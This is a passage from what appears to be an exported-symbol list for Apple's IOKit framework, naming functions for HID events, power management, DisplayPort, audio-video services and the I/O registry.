_IOAVServiceCopyProperties, - _IOAVServiceCopyProperty, _IOAVServiceCreate, _IOAVServiceCreateWithLocation, - _IOAVServiceCreateWithService, _IOAVServiceGetDevice, - _IOAVServiceGetLinkData, _IOAVServiceGetLinkDataWithSource, - _IOAVServiceGetPower, _IOAVServiceGetProtectionStatus, - _IOAVServiceGetProtectionType, _IOAVServiceGetTypeID, - _IOAVServiceSetEventLogCommandMask, _IOAVServiceSetEventLogEventMask, - _IOAVServiceSetEventLogSize, _IOAVServiceSetLogLevel, - _IOAVServiceSetLogLevelMask, _IOAVServiceSetPower, - _IOAVServiceSetProperty, _IOAVServiceSetVirtualEDIDMode, - _IOAVServiceStartInfoFrame, _IOAVServiceStartInfoFrameWithSource, - _IOAVServiceStartLink, _IOAVServiceStartLinkWithSource, - _IOAVServiceStopInfoFrame, _IOAVServiceStopInfoFrameWithSource, - _IOAVServiceStopLink, _IOAVServiceStopLinkWithSource, - _IOAVServiceSupportsLink, _IOAVStandardTypeString, - _IOAVSupportedVideoTimingDataListTypeString, _IOAVTransportString, - _IOAVVideoActiveFormatAspectRatio, 
_IOAVVideoAxisString, - _IOAVVideoColorBitDepth, _IOAVVideoColorBitDepthScalar, - _IOAVVideoColorCoefficientString, _IOAVVideoColorDynamicRangeString, - _IOAVVideoColorSpaceString, _IOAVVideoGetPixelClockTolerance, - _IOAVVideoInterfaceCopyColorElements, _IOAVVideoInterfaceCopyDiagnosticsString, - _IOAVVideoInterfaceCopyProperties, _IOAVVideoInterfaceCopyProperty, - _IOAVVideoInterfaceCopyTimingElements, _IOAVVideoInterfaceCreate, - _IOAVVideoInterfaceCreateWithLocation, _IOAVVideoInterfaceCreateWithService, - _IOAVVideoInterfaceGetLinkData, _IOAVVideoInterfaceGetLinkDataWithSource, - _IOAVVideoInterfaceGetService, _IOAVVideoInterfaceGetTypeID, - _IOAVVideoInterfaceSetBounds, _IOAVVideoInterfaceSetColorDitherRemoval, - _IOAVVideoInterfaceSetLogLevel, _IOAVVideoInterfaceSetLogLevelMask, - _IOAVVideoInterfaceSetProperty, _IOAVVideoInterfaceSetRotation, - _IOAVVideoInterfaceStartLink, _IOAVVideoInterfaceStartLinkWithSource, - _IOAVVideoInterfaceStopLink, _IOAVVideoInterfaceStopLinkWithSource, - _IOAVVideoLinkModeString, _IOAVVideoTimingCalculatedTypeString, - _IOAVVideoTimingGetActivePixelClock, _IOAVVideoTimingGetPixelClock, - _IOAVVideoTimingGetSyncRateRounded, _IOAVVideoTimingTypeString, - _IOAllowPowerChange, _IOBSDNameMatching, _IOCFSerialize, - _IOCFURLWriteDataAndPropertiesToResource, _IOCFUnserialize, - _IOCFUnserializeBinary, _IOCFUnserializeWithSize, - _IOCFUnserializeparse, _IOCancelPowerChange, _IOCatalogueGetData, - _IOCatalogueModuleLoaded, _IOCatalogueReset, _IOCatalogueSendData, - _IOCatalogueTerminate, _IOCatlogueGetGenCount, _IOCloseConnection, - _IOCompatibiltyNumber, _IOConnectAddClient, _IOConnectAddRef, - _IOConnectCallAsyncMethod, _IOConnectCallAsyncScalarMethod, - _IOConnectCallAsyncStructMethod, _IOConnectCallMethod, - _IOConnectCallScalarMethod, _IOConnectCallStructMethod, - _IOConnectGetService, _IOConnectMapMemory, _IOConnectMapMemory64, - _IOConnectRelease, _IOConnectSetCFProperties, _IOConnectSetCFProperty, - 
_IOConnectSetNotificationPort, _IOConnectTrap0, - _IOConnectTrap1, _IOConnectTrap2, _IOConnectTrap3, - _IOConnectTrap4, _IOConnectTrap5, _IOConnectTrap6, - _IOConnectUnmapMemory, _IOConnectUnmapMemory64, - _IOCopySystemLoadAdvisoryDetailed, _IOCreatePlugInInterfaceForService, - _IOCreateReceivePort, _IODPCalculateM, _IODPCommandString, - _IODPCompareLinkTrainingData, _IODPControllerCreate, - _IODPControllerCreateWithLocation, _IODPControllerCreateWithService, - _IODPControllerGetAVController, _IODPControllerGetMaxLaneCount, - _IODPControllerGetMaxLinkRate, _IODPControllerGetMinLaneCount, - _IODPControllerGetMinLinkRate, _IODPControllerGetTypeID, - _IODPControllerSetDownspreadModulationFrequency, - _IODPControllerSetDriveSettings, _IODPControllerSetLaneCount, - _IODPControllerSetLinkRate, _IODPControllerSetMaxLaneCount, - _IODPControllerSetMaxLinkRate, _IODPControllerSetMinLaneCount, - _IODPControllerSetMinLinkRate, _IODPControllerSetSupportsALPM, - _IODPControllerSetSupportsDownspread, _IODPControllerSetSupportsEnhancedMode, - _IODPControllerSetSupportsScrambling, _IODPCreateStringWithLinkTrainingData, - _IODPDeviceCreate, _IODPDeviceCreateWithLocation, - _IODPDeviceCreateWithService, _IODPDeviceGetAVDevice, - _IODPDeviceGetController, _IODPDeviceGetLinkTrainingData, - _IODPDeviceGetMaxLaneCount, _IODPDeviceGetMaxLinkRate, - _IODPDeviceGetRevisionMajor, _IODPDeviceGetRevisionMinor, - _IODPDeviceGetSinkCount, _IODPDeviceGetSupportsDownspread, - _IODPDeviceGetSupportsEnhancedMode, _IODPDeviceGetSymbolErrorCount, - _IODPDeviceGetTypeID, _IODPDeviceReadDPCD, _IODPDeviceSetALPMEnabled, - _IODPDeviceTypeString, _IODPDeviceWriteDPCD, _IODPDriveSettingsAreValid, - _IODPEventLogEventTypeString, _IODPLinkMaxPixelRate, - _IODPLinkRateEnum, _IODPLinkRateIsStandard, _IODPLinkRateScalar, - _IODPLinkSymbolRate, _IODPServiceCreate, _IODPServiceCreateWithLocation, - _IODPServiceCreateWithService, _IODPServiceGetAVService, - _IODPServiceGetDevice, _IODPServiceGetSinkCount, - 
_IODPServiceGetSymbolErrorCount, _IODPServiceGetTypeID, - _IODPServiceRetrainLink, _IODPServiceSetLinkCheckEnable, - _IODPStreamClockHz, _IODPTrainingPatternLength, - _IODPVideoMinLinkRate, _IODataQueueAllocateNotificationPort, - _IODataQueueDataAvailable, _IODataQueueDequeue, - _IODataQueueEnqueue, _IODataQueuePeek, _IODataQueueSetNotificationPort, - _IODataQueueWaitForAvailableData, _IODeregisterApp, - _IODeregisterForSystemPower, _IODestroyPlugInInterface, - _IODispatchCalloutFromCFMessage, _IODispatchCalloutFromMessage, - _IOEthernetControllerCreate, _IOEthernetControllerGetBSDSocket, - _IOEthernetControllerGetIONetworkInterfaceObject, - _IOEthernetControllerGetTypeID, _IOEthernetControllerReadPacket, - _IOEthernetControllerRegisterBSDAttachCallback, - _IOEthernetControllerRegisterDisableCallback, _IOEthernetControllerRegisterEnableCallback, - _IOEthernetControllerRegisterPacketAvailableCallback, - _IOEthernetControllerScheduleWithRunLoop, _IOEthernetControllerSetDispatchQueue, - _IOEthernetControllerSetLinkStatus, _IOEthernetControllerSetPowerSavings, - _IOEthernetControllerUnscheduleFromRunLoop, _IOEthernetControllerWritePacket, - _IOGetSystemLoadAdvisory, _IOHIDCopyCFTypeParameter, - _IOHIDCreateSharedMemory, _IOHIDDeviceClose, _IOHIDDeviceConformsTo, - _IOHIDDeviceCopyMatchingElements, _IOHIDDeviceCopyValueMultiple, - _IOHIDDeviceCopyValueMultipleWithCallback, _IOHIDDeviceCreate, - _IOHIDDeviceGetProperty, _IOHIDDeviceGetReport, - _IOHIDDeviceGetReportWithCallback, _IOHIDDeviceGetService, - _IOHIDDeviceGetTypeID, _IOHIDDeviceGetValue, _IOHIDDeviceGetValueWithCallback, - _IOHIDDeviceOpen, _IOHIDDeviceRegisterInputReportCallback, - _IOHIDDeviceRegisterInputReportWithTimeStampCallback, - _IOHIDDeviceRegisterInputValueCallback, _IOHIDDeviceRegisterRemovalCallback, - _IOHIDDeviceScheduleWithRunLoop, _IOHIDDeviceSetInputValueMatching, - _IOHIDDeviceSetInputValueMatchingMultiple, _IOHIDDeviceSetProperty, - _IOHIDDeviceSetReport, _IOHIDDeviceSetReportWithCallback, 
- _IOHIDDeviceSetValue, _IOHIDDeviceSetValueMultiple, - _IOHIDDeviceSetValueMultipleWithCallback, _IOHIDDeviceSetValueWithCallback, - _IOHIDDeviceUnscheduleFromRunLoop, _IOHIDElementAttach, - _IOHIDElementCopyAttached, _IOHIDElementCreateWithDictionary, - _IOHIDElementDetach, _IOHIDElementGetChildren, _IOHIDElementGetCollectionType, - _IOHIDElementGetCookie, _IOHIDElementGetDevice, - _IOHIDElementGetDuplicateIndex, _IOHIDElementGetLogicalMax, - _IOHIDElementGetLogicalMin, _IOHIDElementGetName, - _IOHIDElementGetParent, _IOHIDElementGetPhysicalMax, - _IOHIDElementGetPhysicalMin, _IOHIDElementGetProperty, - _IOHIDElementGetReportCount, _IOHIDElementGetReportID, - _IOHIDElementGetReportSize, _IOHIDElementGetType, - _IOHIDElementGetTypeID, _IOHIDElementGetUnit, _IOHIDElementGetUnitExponent, - _IOHIDElementGetUsage, _IOHIDElementGetUsagePage, - _IOHIDElementHasNullState, _IOHIDElementHasPreferredState, - _IOHIDElementIsArray, _IOHIDElementIsNonLinear, - _IOHIDElementIsRelative, _IOHIDElementIsVirtual, - _IOHIDElementIsWrapping, _IOHIDElementSetProperty, - _IOHIDEventAppendEvent, _IOHIDEventConformsTo, _IOHIDEventConformsToWithOptions, - _IOHIDEventCreate, _IOHIDEventCreateAccelerometerEvent, - _IOHIDEventCreateAccelerometerEventWithType, _IOHIDEventCreateAmbientLightSensorEvent, - _IOHIDEventCreateAtmosphericPressureEvent, _IOHIDEventCreateBiometricEvent, - _IOHIDEventCreateBoundaryScrollEvent, _IOHIDEventCreateButtonEvent, - _IOHIDEventCreateButtonEventWithPressure, _IOHIDEventCreateCompassEvent, - _IOHIDEventCreateCompassEventWithType, _IOHIDEventCreateCopy, - _IOHIDEventCreateData, _IOHIDEventCreateDigitizerEvent, - _IOHIDEventCreateDigitizerFingerEvent, _IOHIDEventCreateDigitizerFingerEventWithQuality, - _IOHIDEventCreateDigitizerStylusEvent, _IOHIDEventCreateDigitizerStylusEventWithPolarOrientation, - _IOHIDEventCreateDockSwipeEvent, _IOHIDEventCreateFluidTouchGestureEvent, - _IOHIDEventCreateForceEvent, _IOHIDEventCreateGyroEvent, - 
_IOHIDEventCreateGyroEventWithType, _IOHIDEventCreateKeyboardEvent, - _IOHIDEventCreateLEDEvent, _IOHIDEventCreateMotionActivtyEvent, - _IOHIDEventCreateMotionGestureEvent, _IOHIDEventCreateMouseEvent, - _IOHIDEventCreateNavigationSwipeEvent, _IOHIDEventCreateOrientationEvent, - _IOHIDEventCreatePolarOrientationEvent, _IOHIDEventCreateProgressEvent, - _IOHIDEventCreateProximtyEvent, _IOHIDEventCreateRelativePointerEvent, - _IOHIDEventCreateRotationEvent, _IOHIDEventCreateScaleEvent, - _IOHIDEventCreateScrollEvent, _IOHIDEventCreateSwipeEvent, - _IOHIDEventCreateSymbolicHotKeyEvent, _IOHIDEventCreateTranslationEvent, - _IOHIDEventCreateUnicodeEvent, _IOHIDEventCreateUnicodeEventWithQuality, - _IOHIDEventCreateVelocityEvent, _IOHIDEventCreateVendorDefinedEvent, - _IOHIDEventCreateWithBytes, _IOHIDEventCreateWithData, - _IOHIDEventCreateZoomToggleEvent, _IOHIDEventGetAttributeData, - _IOHIDEventGetAttributeDataLength, _IOHIDEventGetAttributeDataPtr, - _IOHIDEventGetChildren, _IOHIDEventGetDataLength, - _IOHIDEventGetDataValue, _IOHIDEventGetDataValueWithOptions, - _IOHIDEventGetEvent, _IOHIDEventGetEventFlags, _IOHIDEventGetEventWithOptions, - _IOHIDEventGetFloatMultiple, _IOHIDEventGetFloatMultipleWithOptions, - _IOHIDEventGetFloatValue, _IOHIDEventGetFloatValueWithOptions, - _IOHIDEventGetIntegerMultiple, _IOHIDEventGetIntegerMultipleWithOptions, - _IOHIDEventGetIntegerValue, _IOHIDEventGetIntegerValueWithOptions, - _IOHIDEventGetLatency, _IOHIDEventGetParent, _IOHIDEventGetPhase, - _IOHIDEventGetPosition, _IOHIDEventGetPositionWithOptions, - _IOHIDEventGetSenderID, _IOHIDEventGetTimeStamp, - _IOHIDEventGetType, _IOHIDEventGetTypeID, _IOHIDEventGetTypeString, - _IOHIDEventGetVendorDefinedData, _IOHIDEventIsAbsolute, - _IOHIDEventIsRepeat, _IOHIDEventQueueCreate, _IOHIDEventQueueCreateWithVM, - _IOHIDEventQueueDequeueCopy, _IOHIDEventQueueEnqueue, - _IOHIDEventQueueGetMemoryHandle, _IOHIDEventQueueGetNotificationPort, - _IOHIDEventQueueGetTypeID, 
_IOHIDEventQueueIsActive, - _IOHIDEventQueueSetNotificationPort, _IOHIDEventQueueStart, - _IOHIDEventQueueStop, _IOHIDEventReadBytes, _IOHIDEventRemoveEvent, - _IOHIDEventServerCreate, _IOHIDEventServerGetTypeID, - _IOHIDEventServerScheduleWithDispatchQueue, _IOHIDEventServerUnscheduleFromDispatchQueue, - _IOHIDEventSetAttributeData, _IOHIDEventSetEventFlags, - _IOHIDEventSetFloatMultiple, _IOHIDEventSetFloatMultipleWithOptions, - _IOHIDEventSetFloatValue, _IOHIDEventSetFloatValueWithOptions, - _IOHIDEventSetIntegerMultiple, _IOHIDEventSetIntegerMultipleWithOptions, - _IOHIDEventSetIntegerValue, _IOHIDEventSetIntegerValueWithOptions, - _IOHIDEventSetPhase, _IOHIDEventSetPosition, _IOHIDEventSetPositionWithOptions, - _IOHIDEventSetRepeat, _IOHIDEventSetSenderID, _IOHIDEventSetTimeStamp, - _IOHIDEventSystemClient, _IOHIDEventSystemClientCopyProperty, - _IOHIDEventSystemClientCopyServiceForRegistryID, - _IOHIDEventSystemClientCopyServices, _IOHIDEventSystemClientCreate, - _IOHIDEventSystemClientCreateWithType, _IOHIDEventSystemClientDispatchEvent, - _IOHIDEventSystemClientGetTypeID, _IOHIDEventSystemClientGetTypeString, - _IOHIDEventSystemClientRegisterDeviceMatchingBlock, - _IOHIDEventSystemClientRegisterDeviceMatchingCallback, - _IOHIDEventSystemClientRegisterEventBlock, _IOHIDEventSystemClientRegisterEventCallback, - _IOHIDEventSystemClientRegisterEventFilterBlock, - _IOHIDEventSystemClientRegisterEventFilterBlockWithPriority, - _IOHIDEventSystemClientRegisterEventFilterCallback, - _IOHIDEventSystemClientRegisterEventFilterCallbackWithPriority, - _IOHIDEventSystemClientRegisterPropertyChangedCallback, - _IOHIDEventSystemClientRegisterResetCallback, _IOHIDEventSystemClientRegistryIDConformsTo, - _IOHIDEventSystemClientScheduleWithDispatchQueue, - _IOHIDEventSystemClientScheduleWithRunLoop, _IOHIDEventSystemClientSetMatching, - _IOHIDEventSystemClientSetMatchingMultiple, _IOHIDEventSystemClientSetProperty, - _IOHIDEventSystemClientUnregisterDeviceMatchingBlock, - 
_IOHIDEventSystemClientUnregisterDeviceMatchingCallback, - _IOHIDEventSystemClientUnregisterEventBlock, _IOHIDEventSystemClientUnregisterEventCallback, - _IOHIDEventSystemClientUnregisterEventFilterBlock, - _IOHIDEventSystemClientUnregisterEventFilterCallback, - _IOHIDEventSystemClientUnregisterPropertyChangedCallback, - _IOHIDEventSystemClientUnregisterResetCallback, - _IOHIDEventSystemClientUnscheduleFromDispatchQueue, - _IOHIDEventSystemClientUnscheduleWithRunLoop, _IOHIDEventSystemClose, - _IOHIDEventSystemConnectionDispatchEvent, _IOHIDEventSystemConnectionGetAttribute, - _IOHIDEventSystemConnectionGetTask, _IOHIDEventSystemConnectionGetType, - _IOHIDEventSystemConnectionGetTypeID, _IOHIDEventSystemConnectionGetTypeString, - _IOHIDEventSystemCopyConnections, _IOHIDEventSystemCopyEvent, - _IOHIDEventSystemCopyMatchingServices, _IOHIDEventSystemCopyService, - _IOHIDEventSystemCopyServices, _IOHIDEventSystemCreate, - _IOHIDEventSystemGetProperty, _IOHIDEventSystemGetTypeID, - _IOHIDEventSystemOpen, _IOHIDEventSystemRegisterConnectionAdditionCallback, - _IOHIDEventSystemRegisterConnectionRemovalCallback, - _IOHIDEventSystemRegisterServicesCallback, _IOHIDEventSystemSetCallback, - _IOHIDEventSystemSetProperty, _IOHIDEventSystemUnregisterConnectionAdditionCallback, - _IOHIDEventSystemUnregisterConnectionRemovalCallback, - _IOHIDEventSystemUnregisterServicesCallback, _IOHIDEventTypeGetName, - _IOHIDGetAccelerationWithKey, _IOHIDGetActivityState, - _IOHIDGetButtonEventNum, _IOHIDGetModifierLockState, - _IOHIDGetMouseAcceleration, _IOHIDGetMouseButtonMode, - _IOHIDGetParameter, _IOHIDGetScrollAcceleration, - _IOHIDGetStateForSelector, _IOHIDManagerClose, _IOHIDManagerCopyDevices, - _IOHIDManagerCreate, _IOHIDManagerGetProperty, _IOHIDManagerGetTypeID, - _IOHIDManagerOpen, _IOHIDManagerRegisterDeviceMatchingCallback, - _IOHIDManagerRegisterDeviceRemovalCallback, _IOHIDManagerRegisterInputReportCallback, - _IOHIDManagerRegisterInputValueCallback, 
_IOHIDManagerSaveToPropertyDomain, - _IOHIDManagerScheduleWithRunLoop, _IOHIDManagerSetDeviceMatching, - _IOHIDManagerSetDeviceMatchingMultiple, _IOHIDManagerSetInputValueMatching, - _IOHIDManagerSetInputValueMatchingMultiple, _IOHIDManagerSetProperty, - _IOHIDManagerUnscheduleFromRunLoop, _IOHIDNotificationCreate, - _IOHIDNotificationGetClientCallback, _IOHIDNotificationGetClientRefcon, - _IOHIDNotificationGetClientTarget, _IOHIDNotificationGetOwnerCallback, - _IOHIDNotificationGetOwnerRefcon, _IOHIDNotificationGetOwnerTarget, - _IOHIDNotificationGetTypeID, _IOHIDPostEvent, _IOHIDQueueAddElement, - _IOHIDQueueContainsElement, _IOHIDQueueCopyNextValue, - _IOHIDQueueCopyNextValueWithTimeout, _IOHIDQueueCreate, - _IOHIDQueueGetDepth, _IOHIDQueueGetDevice, _IOHIDQueueGetTypeID, - _IOHIDQueueRegisterValueAvailableCallback, _IOHIDQueueRemoveElement, - _IOHIDQueueScheduleWithRunLoop, _IOHIDQueueSetDepth, - _IOHIDQueueStart, _IOHIDQueueStop, _IOHIDQueueUnscheduleFromRunLoop, - _IOHIDRegisterVirtualDisplay, _IOHIDServiceClientConformsTo, - _IOHIDServiceClientCopyEvent, _IOHIDServiceClientCopyProperty, - _IOHIDServiceClientGetRegistryID, _IOHIDServiceClientGetTypeID, - _IOHIDServiceClientRegisterRemovalBlock, _IOHIDServiceClientRegisterRemovalCallback, - _IOHIDServiceClientSetElementValue, _IOHIDServiceClientSetProperty, - _IOHIDServiceConformsTo, _IOHIDServiceConnectionCacheContainsKey, - _IOHIDServiceConnectionCacheCopyValueForKey, _IOHIDServiceConnectionCacheCreate, - _IOHIDServiceConnectionCacheGetReportDeadline, _IOHIDServiceConnectionCacheGetTypeID, - _IOHIDServiceConnectionCacheGetUnresponsiveness, - _IOHIDServiceConnectionCacheSetReportDeadline, _IOHIDServiceConnectionCacheSetUnresponsiveness, - _IOHIDServiceConnectionCacheSetValueForKey, _IOHIDServiceCopyEvent, - _IOHIDServiceCopyProperty, _IOHIDServiceCreatePropertyChangedNotification, - _IOHIDServiceCreateRemovalNotification, _IOHIDServiceFilterClose, - _IOHIDServiceFilterCopyPropertyForClient, 
_IOHIDServiceFilterCreate, - _IOHIDServiceFilterFilterCopyEvent, _IOHIDServiceFilterFilterEvent, - _IOHIDServiceFilterGetType, _IOHIDServiceFilterGetTypeID, - _IOHIDServiceFilterMatch, _IOHIDServiceFilterOpen, - _IOHIDServiceFilterSchedule, _IOHIDServiceFilterSetEventCallback, - _IOHIDServiceFilterSetOutputEvent, _IOHIDServiceFilterSetPropertyForClient, - _IOHIDServiceFilterUnschedule, _IOHIDServiceGetProperty, - _IOHIDServiceGetRegistryID, _IOHIDServiceGetTypeID, - _IOHIDServiceMatchPropertyTable, _IOHIDServiceSetElementValue, - _IOHIDServiceSetOutputEvent, _IOHIDServiceSetProperty, - _IOHIDSessionAddService, _IOHIDSessionClose, _IOHIDSessionCopyEvent, - _IOHIDSessionCreate, _IOHIDSessionFilterClose, _IOHIDSessionFilterCopyEvent, - _IOHIDSessionFilterCreate, _IOHIDSessionFilterFilterCopyEvent, - _IOHIDSessionFilterFilterEvent, _IOHIDSessionFilterGetPropertyForClient, - _IOHIDSessionFilterGetType, _IOHIDSessionFilterGetTypeID, - _IOHIDSessionFilterOpen, _IOHIDSessionFilterRegisterService, - _IOHIDSessionFilterScheduleWithDispatchQueue, _IOHIDSessionFilterSetPropertyForClient, - _IOHIDSessionFilterUnregisterService, _IOHIDSessionFilterUnscheduleFromDispatchQueue, - _IOHIDSessionGetProperty, _IOHIDSessionGetTypeID, - _IOHIDSessionOpen, _IOHIDSessionRemoveService, _IOHIDSessionSetProperty, - _IOHIDSetAccelerationWithKey, _IOHIDSetCFTypeParameter, - _IOHIDSetCursorBounds, _IOHIDSetCursorEnable, _IOHIDSetEventsEnable, - _IOHIDSetFixedMouseLocation, _IOHIDSetModifierLockState, - _IOHIDSetMouseAcceleration, _IOHIDSetMouseButtonMode, - _IOHIDSetMouseLocation, _IOHIDSetOnScreenCursorBounds, - _IOHIDSetParameter, _IOHIDSetScrollAcceleration, - _IOHIDSetStateForSelector, _IOHIDSetVirtualDisplayBounds, - _IOHIDTransactionAddElement, _IOHIDTransactionClear, - _IOHIDTransactionCommit, _IOHIDTransactionCommitWithCallback, - _IOHIDTransactionContainsElement, _IOHIDTransactionCreate, - _IOHIDTransactionGetDevice, _IOHIDTransactionGetDirection, - _IOHIDTransactionGetTypeID, 
_IOHIDTransactionGetValue, - _IOHIDTransactionRemoveElement, _IOHIDTransactionScheduleWithRunLoop, - _IOHIDTransactionSetDirection, _IOHIDTransactionSetValue, - _IOHIDTransactionUnscheduleFromRunLoop, _IOHIDUnregisterVirtualDisplay, - _IOHIDUserDeviceCreate, _IOHIDUserDeviceCreateWithOptions, - _IOHIDUserDeviceGetTypeID, _IOHIDUserDeviceHandleReport, - _IOHIDUserDeviceHandleReportAsync, _IOHIDUserDeviceHandleReportAsyncWithTimeStamp, - _IOHIDUserDeviceHandleReportWithTimeStamp, _IOHIDUserDeviceRegisterGetReportCallback, - _IOHIDUserDeviceRegisterGetReportWithReturnLengthCallback, - _IOHIDUserDeviceRegisterSetReportCallback, _IOHIDUserDeviceScheduleWithDispatchQueue, - _IOHIDUserDeviceScheduleWithRunLoop, _IOHIDUserDeviceUnscheduleFromDispatchQueue, - _IOHIDUserDeviceUnscheduleFromRunLoop, _IOHIDValueCreateWithBytes, - _IOHIDValueCreateWithBytesNoCopy, _IOHIDValueCreateWithIntegerValue, - _IOHIDValueGetBytePtr, _IOHIDValueGetElement, _IOHIDValueGetIntegerValue, - _IOHIDValueGetLength, _IOHIDValueGetScaledValue, - _IOHIDValueGetTimeStamp, _IOHIDValueGetTypeID, _IOInitContainerClasses, - _IOIteratorIsValid, _IOIteratorNext, _IOIteratorReset, - _IOKitGetBusyState, _IOKitWaitQuiet, _IOMIGMachPortCacheAdd, - _IOMIGMachPortCacheCopy, _IOMIGMachPortCacheRemove, - _IOMIGMachPortCreate, _IOMIGMachPortGetPort, _IOMIGMachPortGetTypeID, - _IOMIGMachPortRegisterDemuxCallback, _IOMIGMachPortRegisterTerminationCallback, - _IOMIGMachPortScheduleWithDispatchQueue, _IOMIGMachPortScheduleWithRunLoop, - _IOMIGMachPortUnscheduleFromDispatchQueue, _IOMIGMachPortUnscheduleFromRunLoop, - _IOMasterPort, _IONetworkClose, _IONetworkGetDataCapacity, - _IONetworkGetDataHandle, _IONetworkGetPacketFiltersMask, - _IONetworkOpen, _IONetworkReadData, _IONetworkResetData, - _IONetworkSetPacketFiltersMask, _IONetworkWriteData, - _IONotificationPortCreate, _IONotificationPortDestroy, - _IONotificationPortGetMachPort, _IONotificationPortGetRunLoopSource, - _IONotificationPortSetDispatchQueue, 
_IOObjectConformsTo, - _IOObjectCopyBundleIdentifierForClass, _IOObjectCopyClass, - _IOObjectCopySuperclassForClass, _IOObjectGetClass, - _IOObjectGetKernelRetainCount, _IOObjectGetRetainCount, - _IOObjectGetUserRetainCount, _IOObjectIsEqualTo, - _IOObjectRelease, _IOObjectRetain, _IOOpenConnection, - _IOOpenFirmwarePathMatching, _IOPMActivateSystemPowerSettings, - _IOPMAllowsBackgroundTask, _IOPMAllowsPushServiceTask, - _IOPMAssertionCopyProperties, _IOPMAssertionCreate, - _IOPMAssertionCreateWithDescription, _IOPMAssertionCreateWithName, - _IOPMAssertionCreateWithProperties, _IOPMAssertionDeclareNotificationEvent, - _IOPMAssertionDeclareSystemActivity, _IOPMAssertionDeclareUserActivity, - _IOPMAssertionNotify, _IOPMAssertionRelease, _IOPMAssertionRetain, - _IOPMAssertionSetBTCollection, _IOPMAssertionSetProperty, - _IOPMAssertionSetTimeout, _IOPMCancelAllRepeatingPowerEvents, - _IOPMCancelAllScheduledPowerEvents, _IOPMCancelScheduledPowerEvent, - _IOPMChangeSystemActivityAssertionBehavior, _IOPMClaimSystemWakeEvent, - _IOPMConnectionAcknowledgeEvent, _IOPMConnectionAcknowledgeEventWithOptions, - _IOPMConnectionCreate, _IOPMConnectionGetSystemCapabilities, - _IOPMConnectionRelease, _IOPMConnectionScheduleWithRunLoop, - _IOPMConnectionSetDispatchQueue, _IOPMConnectionSetNotification, - _IOPMConnectionUnscheduleFromRunLoop, _IOPMCopyActivePMPreferences, - _IOPMCopyActivePowerProfiles, _IOPMCopyAssertionActivityAggregate, - _IOPMCopyAssertionActivityAggregateWithAllocator, - _IOPMCopyAssertionActivityLog, _IOPMCopyAssertionActivityLogWithAllocator, - _IOPMCopyAssertionActivityUpdate, _IOPMCopyAssertionActivityUpdateWithAllocator, - _IOPMCopyAssertionsByProcess, _IOPMCopyAssertionsByProcessWithAllocator, - _IOPMCopyAssertionsByType, _IOPMCopyAssertionsStatus, - _IOPMCopyBatteryInfo, _IOPMCopyCPUPowerStatus, _IOPMCopyConnectionStatus, - _IOPMCopyCustomPMPreferences, _IOPMCopyHIDPostEventHistory, - _IOPMCopyPMPreferences, _IOPMCopyPowerHistory, 
_IOPMCopyPowerHistoryDetailed, - _IOPMCopyPowerProfiles, _IOPMCopyPowerStateInfo, - _IOPMCopyRepeatingPowerEvents, _IOPMCopyScheduledPowerEvents, - _IOPMCopySleepPreventersList, _IOPMCopySleepWakeFailure, - _IOPMCopySystemPowerSettings, _IOPMCopyUPSShutdownLevels, - _IOPMCopyUnabridgedActivePMPreferences, _IOPMCopyUserActivityLevelDescription, - _IOPMCtlAssertionType, _IOPMDebugTracePoint, _IOPMDeclareNetworkClientActivity, - _IOPMFeatureIsAvailable, _IOPMFeatureIsAvailableWithSupportedTable, - _IOPMFindPowerManagement, _IOPMGetActivePushConnectionState, - _IOPMGetAggressiveness, _IOPMGetCapabilitiesDescription, - _IOPMGetDarkWakeThermalEmergencyCount, _IOPMGetLastWakeTime, - _IOPMGetPerformanceWarningLevel, _IOPMGetSleepServicesActive, - _IOPMGetThermalWarningLevel, _IOPMGetUUID, _IOPMGetUserActivityLevel, - _IOPMGetValueInt, _IOPMIsADarkWake, _IOPMIsASilentWake, - _IOPMIsASleep, _IOPMIsAUserWake, _IOPMOverrideDefaultPMPreferences, - _IOPMPerformBlockWithAssertion, _IOPMPrefsNotificationCreateRunLoopSource, - _IOPMRequestSysWake, _IOPMRevertPMPreferences, _IOPMSchedulePowerEvent, - _IOPMScheduleRepeatingPowerEvent, _IOPMScheduleUserActiveChangedNotification, - _IOPMScheduleUserActivityLevelNotification, _IOPMSetActivePowerProfiles, - _IOPMSetActivePushConnectionState, _IOPMSetAggressiveness, - _IOPMSetAssertionActivityAggregate, _IOPMSetAssertionActivityLog, - _IOPMSetBTWakeInterval, _IOPMSetCustomPMPreferences, - _IOPMSetDWLingerInterval, _IOPMSetDebugFlags, _IOPMSetPMPreferences, - _IOPMSetReservePowerMode, _IOPMSetSleepServicesWakeTimeCap, - _IOPMSetSystemPowerSetting, _IOPMSetUPSShutdownLevels, - _IOPMSetValueInt, _IOPMSleepEnabled, _IOPMSleepSystem, - _IOPMSleepSystemWithOptions, _IOPMSleepWakeCopyUUID, - _IOPMSleepWakeSetUUID, _IOPMUnregisterNotification, - _IOPMUserDidChangeCallback, _IOPMUserIsActive, _IOPSAccCreateAttachNotification, - _IOPSAccCreateLimitedPowerNotification, _IOPSAccNotificationCreateRunLoopSource, - _IOPSCopyChargeLog, 
_IOPSCopyExternalPowerAdapterDetails, - _IOPSCopyInternalBatteriesArray, _IOPSCopyPowerSourcesByType, - _IOPSCopyPowerSourcesInfo, _IOPSCopyPowerSourcesList, - _IOPSCopyUPSArray, _IOPSCreateLimitedPowerNotification, - _IOPSCreatePowerSource, _IOPSDrawingUnlimitedPower, - _IOPSGetActiveBattery, _IOPSGetActiveUPS, _IOPSGetBatteryWarningLevel, - _IOPSGetPercentRemaining, _IOPSGetPowerSourceDescription, - _IOPSGetProvidingPowerSourceType, _IOPSGetSupportedPowerSources, - _IOPSGetTimeRemainingEstimate, _IOPSNotificationCreateRunLoopSource, - _IOPSPowerSourceSupported, _IOPSReleasePowerSource, - _IOPSRequestBatteryUpdate, _IOPSSetPowerSourceDetails, - _IORegisterApp, _IORegisterClient, _IORegisterForSystemPower, - _IORegistryCreateEnumerator, _IORegistryCreateIterator, - _IORegistryDisposeEnumerator, _IORegistryEntryCopyFromPath, - _IORegistryEntryCopyPath, _IORegistryEntryCreateCFProperties, - _IORegistryEntryCreateCFProperty, _IORegistryEntryCreateIterator, - _IORegistryEntryFromPath, _IORegistryEntryGetChildEntry, - _IORegistryEntryGetChildIterator, _IORegistryEntryGetLocationInPlane, - _IORegistryEntryGetName, _IORegistryEntryGetNameInPlane, - _IORegistryEntryGetParentEntry, _IORegistryEntryGetParentIterator, - _IORegistryEntryGetPath, _IORegistryEntryGetProperty, - _IORegistryEntryGetRegistryEntryID, _IORegistryEntryIDMatching, - _IORegistryEntryInPlane, _IORegistryEntrySearchCFProperty, - 